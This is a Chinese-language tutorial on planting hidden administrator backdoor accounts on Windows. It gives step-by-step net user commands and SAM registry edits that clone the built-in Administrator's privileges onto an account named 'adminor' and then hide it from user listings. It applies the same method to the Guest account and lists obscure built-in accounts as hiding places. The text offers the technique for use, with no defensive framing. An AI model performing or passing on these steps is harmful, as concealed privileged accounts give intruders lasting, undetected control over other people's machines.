建立隐藏用户
1. net user adminor 123456 /add/
2.net localgroup administrators adminor /add
3.net user （没有adminor,继续）
4.compmgmt.msc (查看用户,有adminor)
5.regedit  到了注册表`继续→HKEY_LOCAL_MACHINE 找到sam子键`右键权限设置完全控制
6.退出注册表然后再进再找到sam`现在多出几个子键
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\user
 出来5个选项,前三个分别是Administrator,Guest,SUPPORT_388945a0三个内置用户的默认权限,而紧跟着的下面这个是adminor的权限！
7.选000001F4看到f表项,右选修改,复制所有,继续点开adminor的权限子键看到f和v选f修改替换成管理员所有权限！
 8.在adminor下面的一个子键叫names`对应的adminor用户名！

 9.net user adminor /del
10.compmgmt.msc(看用户adminor消失,注册表那里也应该消失了)
11.这个时候再选那两个导出的注册表依依导入,所有步骤完成,接下来验证！
12.net user (无adminor,同时也查看计算机管理里面的用户`adminor`也消失）
13.注销,登陆名adminor 密码123456   验证完毕[/b]

Guest 隐藏帐号

参照前面的步骤，这里要建立隐藏的来宾帐号。具体步骤简要概括为：
一、在CMD使用net user guest /Active:yes
二、net user guest password改变来宾帐号的密码
三、方法如上，进入注册表复制000001F4项F值覆盖Guest对应的子键F值。
四、导出Guest对应的项及子键值的项，删除Guest两个子项。 五、最后，再把导出的Guest两个项导入注册表。
不常用的隐蔽帐号列举如下：
名称　　　　　　　　　　　全名　　　　　　　　　　　　　　描述
ASPNET　　　　　　　　　ASP.NET Machine Account　　　　Account used for running the ASP.NET worker process (aspnet_wp.exe)　　
Guest　　　　　　　　　　　　　　　　　　　　　　　　　　供来宾访问计算机或访问域的内置帐户
HelpAssistant　远程桌面助手帐户　　　　　　　　　　　 　　提供远程协助的帐户
IUSR_909D513FDA59490　Internet 来宾帐户　　　　　　　　匿名访问 Internet 信息服务的内置帐户
IWAM_909D513FDA59490　启动 IIS 进程帐户　　　　　　　 用于启动进程外应用程序的 Internet 信息服务的内置帐户
SUPPORT_388945a0　　　CN=Microsoft Corporation,L=Redmond,S=Washington,C=US　这是一个帮助和支持服务的提供商帐户
使用net localgroup Administrators命令将隐蔽帐号加入超级管理员组，即具有拥有管理员的权限。